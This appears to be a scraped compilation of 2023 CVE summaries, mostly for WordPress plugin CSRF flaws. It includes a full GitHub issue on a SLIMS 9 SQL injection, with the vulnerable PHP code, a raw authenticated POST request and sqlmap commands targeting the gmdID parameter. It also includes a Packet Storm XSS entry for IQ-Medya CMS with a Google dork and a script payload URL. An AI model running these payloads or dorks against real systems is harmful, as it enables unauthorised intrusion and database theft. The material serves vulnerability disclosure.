The Profile Builder WordPress plugin before 3.9.8 lacks authorisation and CSRF in its page creation function which allows unauthenticated users to create the register, log-in and edit-profile pages from the plugin on the blog

CVE-2023-4059

SQL Injection vulnerability in Chamilo LMS v.1.11 thru v.1.11.20 allows a remote privileged attacker to obtain sensitive information via the import sessions functions.

CVE-2023-39582: Security issues - Chamilo LMS

An authorization/sensitive information disclosure vulnerability was identified in GitHub Enterprise Server that allowed a fork to retain read access to an upstream repository after its visibility was changed to private. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.10.0 and was fixed in versions 3.9.4, 3.8.9, 3.7.16 and 3.6.18. This vulnerability was reported via the GitHub Bug Bounty program.


CVE-2023-23763: Release notes - GitHub Enterprise Server 3.6 Docs

Senayan Library Management Systems SLIMS 9 Bulian v 9.6.1 is vulnerable to SQL Injection via admin/modules/circulation/loan_rules.php.

**The bug**

A SQL Injection exists in admin/modules/circulation/loan_rules.php at the code below

/\* RECORD OPERATION \*/
if (isset($\_POST\['saveData'\])) {
    $data\['member\_type\_id'\] = $\_POST\['memberTypeID'\];
    $data\['coll\_type\_id'\] = $\_POST\['collTypeID'\];
    $data\['gmd\_id'\] = $\_POST\['gmdID'\];
    $data\['loan\_limit'\] = trim($\_POST\['loanLimit'\]);
    $data\['loan\_periode'\] = trim($\_POST\['loanPeriode'\]);
    $data\['reborrow\_limit'\] = trim($\_POST\['reborrowLimit'\]);
    $data\['fine\_each\_day'\] = trim($\_POST\['fineEachDay'\]);
    $data\['grace\_periode'\] = trim($\_POST\['gracePeriode'\]);
    $data\['input\_date'\] = date('Y-m-d');
    $data\['last\_update'\] = date('Y-m-d');
    // create sql op object
    $sql\_op = new simbio\_dbop($dbs);
    if (isset($\_POST\['updateRecordID'\])) {
        /\* UPDATE RECORD MODE \*/
        // remove input date
        unset($data\['input\_date'\]);
        // filter update record ID
        $updateRecordID = (integer)$\_POST\['updateRecordID'\];
        // update the data
        $update = $sql\_op\->update('mst\_loan\_rules', $data, 'loan\_rules\_id='.$updateRecordID);
        if ($update) {
            toastr(\_\_('Loan Rules Successfully Updated'))->success();
            echo '<script language="Javascript">parent.jQuery(\\'#mainContent\\').simbioAJAX(parent.jQuery.ajaxHistory\[0\].url);</script>';
        } else { toastr(\_\_('Loan Rules FAILED to Updated. Please Contact System Administrator')."\\nDEBUG : ".$sql\_op\->error)->error(); }
        exit();
    } else {
        /\* INSERT RECORD MODE \*/
        $insert = $sql\_op\->insert('mst\_loan\_rules', $data); // BUG HERE
        if ($insert) {
            toastr(\_\_('New Loan Rules Successfully Saved'))->success();
            echo '<script language="Javascript">parent.jQuery(\\'#mainContent\\').simbioAJAX(\\''.$\_SERVER\['PHP\_SELF'\].'\\');</script>';
        } else { toastr(\_\_('Loan Rules FAILED to Save. Please Contact System Administrator')."\\n".$sql\_op\->error)->error(); }
        exit();
    }
    exit();
} 

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to circulation
    
2.  make sure burp suit is on to capture the request such as below:
    

3.  save the request into a file (example.req)
    
4.  run the test with sqlmao with the command sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql  
    
5.  voila
    

**example.req**

    POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
    Host: localhost
    Content-Length: 1195
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
    Accept-Encoding: gzip, deflate
    Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
    Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
    Connection: close
    
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="csrf_token"
    
    98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="form_name"
    
    mainForm
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="memberTypeID"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="collTypeID"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="gmdID"
    
    0
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="loanLimit"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="loanPeriode"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="reborrowLimit"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="fineEachDay"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="gracePeriode"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="saveData"
    
    Save
    ------WebKitFormBoundarypqBOyIslkQAaoPCi--
    

**Screenshots****proof-of-concept current database**

command to run sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql  --current-db  

**versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

**notes**

added comment of the bug. last edit at 18 August 2023 21.12 GMT+7

CVE-2023-40970: [Security Bugs] SQL Injection at loan_rules.php · Issue #205 · slims/slims9_bulian

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

**IQ-Medya CMS 2.0 Cross Site Scripting**

Posted Aug 30, 2023

Authored by indoushka

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ab1e62fc2de79708c62ff8ba7205592a862ce474915df4ff25b9a691573bdc26

Download | Favorite | View

**IQ-Medya CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : İQ-Medya CMS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,058)
*   Arbitrary (16,220)
*   BBS (2,859)
*   Bypass (1,741)
*   CGI (1,026)
*   Code Execution (7,285)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,462)
*   Encryption (2,370)
*   Exploit (52,004)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,046)
*   JavaScript (859)
*   Kernel (6,696)
*   Local (14,466)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,340)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,817)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,188)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,798)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,974)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,555)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,781)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,852)
*   UNIX (9,302)
*   UnixWare (186)
*   Windows (6,579)
*   Other

IQ-Medya CMS 2.0 Cross Site Scripting

The POEditor WordPress plugin before 0.9.8 does not have CSRF checks in various places, which could allow attackers to make logged in admins perform unwanted actions, such as reset the plugin's settings and update its API key via CSRF attacks.

CVE-2023-4209

The User Activity Tracking and Log WordPress plugin before 4.0.9 does not have proper CSRF checks when managing its license, which could allow attackers to make logged in admins update and deactivate the plugin's license via CSRF attacks

CVE-2023-4150

The GDPR Cookie Compliance (CCPA, DSGVO, Cookie Consent) WordPress plugin before 4.12.5 does not have proper CSRF checks when managing its license, which could allow attackers to make logged in admins update and deactivate the plugin's license via CSRF attacks

CVE-2023-4013

The Upload Media By URL WordPress plugin before 1.0.8 does not have CSRF check when uploading files, which could allow attackers to make logged in admins upload files (including HTML containing JS code for users with the unfiltered_html capability) on their behalf.

CVE-2023-3720

The Subscribers Text Counter WordPress plugin before 1.7.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack, which also lead to Stored Cross-Site Scripting due to the lack of sanitisation and escaping

Tag

#csrf